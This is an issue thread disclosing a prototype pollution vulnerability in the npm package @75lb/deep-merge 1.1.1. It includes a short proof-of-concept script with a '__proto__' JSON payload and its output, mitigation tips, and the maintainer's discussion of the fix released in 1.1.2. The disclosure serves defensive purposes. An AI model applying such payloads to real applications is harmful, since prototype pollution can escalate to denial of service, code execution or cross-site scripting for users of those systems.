Prototype Pollution vulnerability affecting 75lb/deep-merge@1.1.1

[mestrtee]

Overview

Affected versions of this package are vulnerable to Prototype Pollution. An attacker can manipulate the prototype of an object, potentially leading to the alteration of behavior of all objects inheriting from the affected prototype by modify built-in Object.prototype through reachable special properties __proto__ and constructor.prototype. Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

PoC:

(async () => {
  const lib = await import('@75lb/deep-merge');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.default ({}, BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack: {}


After Attack: {"polluted":true}

How to prevent:

• Freeze the root prototype using Object.freeze
• Require schema validation of JSON input.
• Avoid using unsafe recursive merge functions.
• Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
• As a best practice use Map instead of Object

[75lb]

Beside pollution risk, is this issue causing you any operational problems?

[mestrtee]

The pollution is the first step to facilitate further attacks such as DOS, RCE, privilege escalation or any other OWASP 10 vulnerabilities depends on the implementation of the module. Please refer to the details in this article Snyk.io

[75lb]

You answered a question I did not ask - I know what the vulnerability is, read my question again please. Is this issue currently causing you any specific operational issues? For example, is a security policy blocking you using the module, or an app which uses the module?

[mestrtee]

Just to clarify, I'm not personally using this package. However, as this issue poses a potential risk to users, I've opened it to collaborate on addressing the vulnerability for the community's safety.

[75lb]

yes, that's fine - I was just trying to assess the level of urgency..

[75lb]

This project currently uses lodash to merge objects - this issue has already been reported upstream, will monitor it..

[hashboard-charlie]

This issue is now a error when running npm audit: https://gist.github.com/mestrtee/b20c3aee8bea16e1863933778da6e4cb

The issue is resolved in later versions of Lodash. https://github.com/lodash/lodash/blob/6a2cc1dfcf7634fea70d1bc5bd22db453df67b42/test/__proto__-property-bugs.spec.js#L26-L54

This package imports lodash.assignwith which is still vulnerable. Lodash no longer applies security updates to dot-suffix "micro packages" (https://lodash.com/per-method-packages, lodash/lodash#5894 (comment)).

This package should be updated to depend on lodash directly and import lodash/assignWith to ensure the minimum amount of code is bundled.

[75lb]

I replaced lodash.assignwith with lodash/assignWith as suggested. Released in @75lb/deep-merge v1.1.2. I also fixed a similar issue in table-layout (used by command-line-usage).

Thanks for the report, let me know if there's anything else.